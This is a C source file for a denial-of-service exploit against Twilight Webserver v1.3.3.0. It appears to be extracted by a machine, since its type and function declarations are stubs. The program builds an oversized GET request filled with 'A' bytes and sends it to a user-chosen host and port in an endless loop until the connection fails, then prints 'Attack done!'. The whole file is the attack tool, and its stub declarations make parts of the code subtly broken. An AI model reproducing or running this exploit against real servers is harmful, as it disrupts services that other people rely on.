
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {int dummy; } ;
typedef int srv ;
typedef int send ;


 int AF_INET ;
 int SOCK_STREAM ;
 int atoi (char*) ;
 int close (int) ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int exit (int ) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int ) ;
 int inet_addr (char*) ;
 int memset (char**,int,int) ;
 int printf (char*,...) ;
 int socket (int ,int ,int ) ;
 int strlen (char*) ;
 int strncat (char*,...) ;
 int strncpy (char*,char*,int) ;
 scalar_t__ write (int,char*,int) ;

int main(int argc, char *argv[])
{
        int sockfd;
        struct sockaddr_in srv;
        struct hostent *host;
        char send[1052], *flood[1037], get[3] = "GET", http[12] = "HTTP/1.0\r\n";

        memset(flood, 0x41, 1037);

        strncpy(send, get, sizeof(send) -1);
        strncat(send, flood, sizeof(send) - strlen(send) -1);
        strncat(send, http, sizeof(send) - strlen(send) -1);

        if(argc < 3)
        {
                printf("Usage: %s [target] <port>\n", argv[0]);
                exit(0);
        }

        if((host = gethostbyname(argv[1])) == ((void*)0))
        {
                printf("Unknown host!\n");
                exit(0);
        }

        srv.sin_family = AF_INET;
        srv.sin_port = htons(atoi(argv[2]));
        srv.sin_addr.s_addr = inet_addr((char*)argv[1]);

        printf("DoS against Twilight Webserver v1.3.3.0\n");

        for(;;)
        {
                if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
                {
                        printf("Can't start socket()!\n"); exit(0);
                }

                if(connect(sockfd,(struct sockaddr*)&srv, sizeof(srv)) < 0)
                {
                        printf("Connection to server broken!\n"); close(sockfd);
                }

                if(write(sockfd, send, strlen(send)) < 0)
                {
                        break;
                }

                close(sockfd);
        }

        printf("Attack done!...\n");

        return 0;
}
